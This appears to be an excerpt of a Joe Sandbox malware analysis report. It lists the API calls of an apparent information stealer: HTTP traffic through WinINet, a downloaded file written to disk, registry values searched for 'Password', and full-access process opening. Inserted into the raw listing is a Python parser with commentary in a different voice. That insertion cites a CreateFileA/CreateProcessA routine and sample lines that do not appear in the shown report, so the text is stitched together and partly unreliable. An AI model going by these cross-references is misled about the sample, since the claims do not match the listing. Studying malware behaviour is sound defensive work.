                                    • Instruction Fuzzy Hash: 726182F554021CEBCB14EBA0DD5AFFD7738AF44304F4041A9B70966182EA786B88CF5A
                                    APIs
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A51
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A68
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A7F
                                      • Part of subcall function 007E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AA0
                                      • Part of subcall function 007E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4AB0
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007E4B7C
                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 007E4BA1
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E4D21
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 007E504F
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007E506B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007E507F
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007E50B0
                                    • InternetCloseHandle.WININET(00000000), ref: 007E5114
                                    • InternetCloseHandle.WININET(00000000), ref: 007E512C
                                    • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 007E4D7C
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • InternetCloseHandle.WININET(00000000), ref: 007E5136
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID:
                                    • API String ID: 2402878923-0
                                    • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                    • Instruction ID: bb4d543341e881acc0d3ae4c8fa8160ff8fb16748c511b032d6d3cadcf473603
                                    • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                    • Instruction Fuzzy Hash: F612ADB191121CFACB15EB90DD66EFEB379AF15300F504199B20A62291DF782F88CF52
                                    APIs
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A51
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A68
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A7F
                                      • Part of subcall function 007E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AA0
                                      • Part of subcall function 007E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4AB0
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 007E6548
                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 007E656A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E659C
                                    • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 007E65EC
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007E6626
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E6638
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007E6664
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007E66D4
                                    • InternetCloseHandle.WININET(00000000), ref: 007E6756
                                    • InternetCloseHandle.WININET(00000000), ref: 007E6760
                                    • InternetCloseHandle.WININET(00000000), ref: 007E676A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID:
                                    • API String ID: 3074848878-0
                                    • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                    • Instruction ID: 404f4e4690358600eeb4e99eed16c0e136369f1a0313229020c01d00ff49e22a
                                    • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                    • Instruction Fuzzy Hash: 8B7161B5A40218EBDB24DFA0DC59FEE7775FB58700F108199F2096B290DBB86A84CF51
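The two WinINet routines above, and the CreateFileA/CreateProcessA routine before them, are printed as flat API bullets in listing order, which is not execution order: HttpOpenRequestA at 007E4D7C appears after InternetCloseHandle at 007E512C. The following is an added example, not code from the report or from Joe Sandbox: a parser for this listing format that turns each bullet into a call record, recovers the address order of direct calls, and tags a function with coarse capabilities from the API names and their hex arguments (WININET module, GENERIC_WRITE in CreateFileA's second argument, CreateProcessA, OpenProcess with 0x001FFFFF). The two sample listings are subsets of the page's own lines; the tag names and the "drop_and_execute" rule are my own choice.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# One bullet of a Joe Sandbox "APIs" listing.  Direct calls start with "•";
# calls reachable through a callee are prefixed "Part of subcall function <addr>:".
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$"
)

@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]   # 8-hex-digit arguments as ints; "?" and literals as None
    ref: Optional[int]          # address of the call instruction
    subcall_of: Optional[int]   # callee address when the call is indirect, else None

def parse_listing(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        args = [int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a) else None for a in raw]
        calls.append(Call(m["api"], m["mod"], args,
                          int(m["ref"], 16) if m["ref"] else None,
                          int(m["sub"], 16) if m["sub"] else None))
    return calls

def call_order(calls: List[Call]) -> List[str]:
    """Direct calls in address order.  The report prints them in listing order, so
    HttpOpenRequestA at 007E4D7C appears after InternetCloseHandle at 007E512C;
    sorting by ref restores the open -> connect -> request -> send -> read chain."""
    direct = [c for c in calls if c.subcall_of is None and c.ref is not None]
    return [c.api for c in sorted(direct, key=lambda c: c.ref)]

GENERIC_WRITE = 0x40000000        # CreateFileA dwDesiredAccess bit
PROCESS_ALL_ACCESS = 0x001FFFFF   # OpenProcess dwDesiredAccess seen in this sample

def capabilities(calls: List[Call]) -> Set[str]:
    """Coarse behaviour tags for one function, counting reachable subcalls too."""
    caps: Set[str] = set()
    for c in calls:
        if c.module == "WININET":
            caps.add("http")
        if c.api in ("CreateFileA", "CreateFileW") and len(c.args) > 1 \
                and c.args[1] is not None and c.args[1] & GENERIC_WRITE:
            caps.add("file_write")
        if c.api in ("CreateProcessA", "CreateProcessW", "WinExec") \
                or c.api.startswith("ShellExecute"):
            caps.add("process_create")
        if c.api == "OpenProcess" and c.args and c.args[0] == PROCESS_ALL_ACCESS:
            caps.add("open_process_all_access")
        if c.module == "ADVAPI32" and c.api.startswith("Reg"):
            caps.add("registry")
    if {"file_write", "process_create"} <= caps:   # my own rule, not the report's
        caps.add("drop_and_execute")
    return caps

# Constructed samples: subsets of the page's own listing lines for two functions.
HTTP_FUNC = """\
  • Part of subcall function 007E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4AB0
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007E4B7C
• StrCmpCA.SHLWAPI(?,0064A480), ref: 007E4BA1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E4D21
• lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007E506B
• HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007E507F
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007E50B0
• InternetCloseHandle.WININET(00000000), ref: 007E512C
• HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 007E4D7C
"""

DROP_FUNC = """\
• memset.MSVCRT ref: 007F0E83
• lstrcat.KERNEL32(?,00420D7C), ref: 007F0EAE
  • Part of subcall function 007F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007F9948
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 007F0FC1
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 007F0FCD
"""

if __name__ == "__main__":
    for name, text in (("http", HTTP_FUNC), ("drop", DROP_FUNC)):
        calls = parse_listing(text)
        print(name, call_order(calls), sorted(capabilities(calls)))
```

Once the arguments are integers the WinINet constants in these listings read off directly: InternetOpenA's second argument 00000001 is INTERNET_OPEN_TYPE_DIRECT, InternetConnectA's 00000003 is INTERNET_SERVICE_HTTP, HttpOpenRequestA's dwFlags 00400100 is INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, and InternetReadFile is asked for 0x7CF (1999) bytes per call, which is why a response is read in a loop.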
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007F92D3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID:
                                    • API String ID: 2244384528-0
                                    • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                    • Instruction ID: 7104d224c4365dd200be214312f4f7543c41ca91e4a6db8de5d12c8f2fdfd0b7
                                    • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                    • Instruction Fuzzy Hash: B071DBB9940208EBDB14DFE4DC89FEEB7B9BF59700F108508F615A7290DB78A905CB61
                                    APIs
                                    • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                    • memset.MSVCRT ref: 0041716A
                                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                    Strings
                                    • sA, xrefs: 00417111
                                    • sA, xrefs: 004172AE, 00417179, 0041717C
                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: OpenProcesslstrcpymemset
                                    • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                    • API String ID: 224852652-2614523144
                                    • Opcode ID: 335029b319d1980603acda44a43de6eff4f01f1b596770656a511b732844fbe7
                                    • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                    • Opcode Fuzzy Hash: 335029b319d1980603acda44a43de6eff4f01f1b596770656a511b732844fbe7
                                    • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007F77A9
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007F77E6
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F786A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F7871
                                    • wsprintfA.USER32 ref: 007F78A7
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\$B
                                    • API String ID: 1544550907-183544611
                                    • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                    • Instruction ID: 3e2b41fb714e65ba80b14e9c6bd12eadfa485790b6548101a65d402adc303487
                                    • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                    • Instruction Fuzzy Hash: B04183B1D04258EFDB14DF94CC59BEEB7B5EF48700F100199F605A7280D7796A84CBA6
                                    APIs
                                      • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                      • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                      • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                      • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                      • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                      • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                    • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                    • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                    • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                    • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                    • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                    • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                    • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                    • task.LIBCPMTD ref: 004076FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: :
                                    • API String ID: 3191641157-3653984579
                                    • Opcode ID: 8dce06a7de27df674dc23bf429c7e28d88ca389d661d162c9425816a7145f92b
                                    • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                    • Opcode Fuzzy Hash: 8dce06a7de27df674dc23bf429c7e28d88ca389d661d162c9425816a7145f92b
                                    • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                    APIs
                                    • lstrcpy.KERNEL32(?,?), ref: 007F1642
                                      • Part of subcall function 007F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F9072
                                      • Part of subcall function 007F94C7: StrStrA.SHLWAPI(?,?), ref: 007F94D3
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F167E
                                      • Part of subcall function 007F94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 007F94F7
                                      • Part of subcall function 007F94C7: lstrlen.KERNEL32(?), ref: 007F950E
                                      • Part of subcall function 007F94C7: wsprintfA.USER32 ref: 007F952E
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F16C6
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F170E
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F1755
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F179D
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F17E5
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F182C
                                    • lstrcpy.KERNEL32(?,00000000), ref: 007F1874
                                      • Part of subcall function 007FAA87: lstrlen.KERNEL32(007E516C,?,?,007E516C,00420DDE), ref: 007FAA92
                                      • Part of subcall function 007FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 007FAAEC
                                    • strtok_s.MSVCRT ref: 007F19B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                    • String ID:
                                    • API String ID: 4276352425-0
                                    • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                    • Instruction ID: 1a1085de41a4f774d475dca9592622b0fd3840361c9343f06800c106cb98a936
                                    • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                    • Instruction Fuzzy Hash: FD7143B695011DEBCB54EBA0DC9DEFE7379AF64300F044598B20DA2241EE799B88CF51
                                    APIs
                                    • memset.MSVCRT ref: 00407314
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                    • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                      • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                    • task.LIBCPMTD ref: 00407555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                    • String ID: Password
                                    • API String ID: 2698061284-3434357891
                                    • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                    • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                    • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                    • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                    APIs
                                    • lstrcatA.KERNEL32(?,00A19220,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                    • lstrcatA.KERNEL32(?,?), ref: 00414820
                                    • lstrcatA.KERNEL32(?,?), ref: 00414834
                                    • lstrcatA.KERNEL32(?,00A14BF8), ref: 00414847
                                    • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                    • lstrcatA.KERNEL32(?,00A19E00), ref: 0041486F
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                      • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                      • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                      • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                      • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID: 0aA
                                    • API String ID: 167551676-2786531170
                                    • Opcode ID: 1757d68d067b46057756a1022eb737b915d2dfc295090359e4600a2c9f7fad42
                                    • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                    • Opcode Fuzzy Hash: 1757d68d067b46057756a1022eb737b915d2dfc295090359e4600a2c9f7fad42
                                    • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00A19418,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00A19418,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                    • __aulldiv.LIBCMT ref: 00418172
                                    • __aulldiv.LIBCMT ref: 00418180
                                    • wsprintfA.USER32 ref: 004181AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2886426298-3474575989
                                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                    • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                    • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                    APIs
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A51
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A68
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A7F
                                      • Part of subcall function 007E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AA0
                                      • Part of subcall function 007E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4AB0
                                    • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 007E6376
                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 007E63AE
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 007E63F6
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007E641A
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 007E6443
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 007E6471
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 007E64B0
                                    • InternetCloseHandle.WININET(?), ref: 007E64BA
                                    • InternetCloseHandle.WININET(00000000), ref: 007E64C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 4287319946-0
                                    • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                    • Instruction ID: 1bf0b469ea516813270a3cfa741f205244df7c0c52a326d4adecf3565d2ea7b2
                                    • Instruction Fuzzy Hash: 1A5162B5A40258EBDB20DF91CC49BEE7779EB58701F108098F605A72C0DB786B89CF95
                                    APIs
                                    • memset.MSVCRT ref: 007F4FEE
